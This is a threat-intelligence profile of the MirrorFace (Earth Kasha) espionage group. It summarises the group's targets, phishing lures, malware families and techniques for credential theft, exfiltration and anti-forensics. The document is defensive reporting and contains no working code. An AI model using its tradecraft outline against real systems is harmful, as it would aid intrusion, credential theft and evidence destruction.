MirrorFace

MirrorFace is a China-aligned cyberespionage threat actor, also known as Earth Kasha, active since at least 2019. The content states that its activity has often been attributed to APT10, and ESET now assesses MirrorFace to be a subgroup under the APT10 umbrella. MirrorFace has targeted organizations in Japan almost exclusively, including media organizations, defense-related companies, think tanks, political entities, academic institutes, and research institutes, as well as entities outside Japan that have relationships with Japan. ESET also reported a 2024 intrusion against a Central European diplomatic institute related to Expo 2025 in Osaka, assessed as the first known MirrorFace targeting of a European entity. MirrorFace relies heavily on spearphishing and tailored social engineering. Reported lures included targeted emails purporting to be from a Japanese political party’s PR department, use of compromised email accounts, Gmail, and OneDrive-hosted payloads, and malicious Word documents or remote Word templates containing VBA code. In Operation AkaiRyū, MirrorFace used a malicious OneDrive-hosted ZIP containing a disguised LNK file that launched cmd.exe and PowerShell to drop additional files, including a malicious Word template. The content also states that MirrorFace has exploited vulnerabilities in Fortigate and Array AG devices for initial access, and that HiddenFace was discovered in an intrusion where attackers exploited a FortiOS or FortiProxy vulnerability. The actor uses custom malware including LODEINFO, HiddenFace (also called NOOPDOOR), ANEL, UPPERCUT, MRSAStealer/MSRAStealer, and a heavily customized AsyncRAT variant. HiddenFace is described as a backdoor developed and exclusively used by MirrorFace and as more complex and versatile than LODEINFO. MirrorFace has also used public or dual-use tools including PuTTY, Cobalt Strike, FRP, Rubeus, GOST, Visual Studio Code remote tunnels, MSBuild, WMI, rar.exe, Makecab, and native Windows utilities. Observed execution and post-compromise behavior includes use of cmd.exe for malware execution, file discovery, and manual file manipulation; PowerShell to drop additional files; MSBuild and WMI to execute tooling; DLL sideloading with legitimate executables; and abuse of a signed McAfee executable during Operation AkaiRyū. The content also states that MirrorFace abused a known Microsoft digital signature verification issue to append encrypted data to signatures that still appeared valid. Collection and credential access activity includes gathering data and files of interest from victim systems, staging them on a single victim machine, exporting stored emails, exporting Chrome web data including contacts, keywords, autofill data, and stored credit card information, and using MRSAStealer/MSRAStealer as a password filter DLL to collect credentials when passwords changed. HiddenFace-related reporting also links MirrorFace to credential theft via MSRAStealer and exfiltration of its encrypted credential store. Discovery and lateral activity described in the content includes use of Ping for system discovery, nltest.exe /domain_trusts to discover domain relationships, native Windows tools to obtain domain user information, file and directory enumeration, and targeting of files such as .doc, .ppt, .xls, .jtd, .eml, .xps, and .pdf. MirrorFace has used RDP to exfiltrate files of interest. Exfiltration and staging methods mentioned include SCP via the PuTTY Secure Copy Protocol client, SFTP, RDP, and archiving with rar.exe and Makecab prior to exfiltration. Defense evasion and anti-forensics behavior includes disabling Windows Defender, modifying the Windows Host Firewall to allow communication over certain ports, deleting Windows event logs, deleting malware directories, archives, delivered tools, and other files from compromised hosts, and using Base64-encoded shellcode in infection chains. The content also notes masquerading behavior, including disguising payloads as PEM files and disguising LNK and self-extracting files as Word documents. Known aliases and related naming in the content: MirrorFace, Earth Kasha. The content also links MirrorFace to APT10 as a subgroup under that umbrella.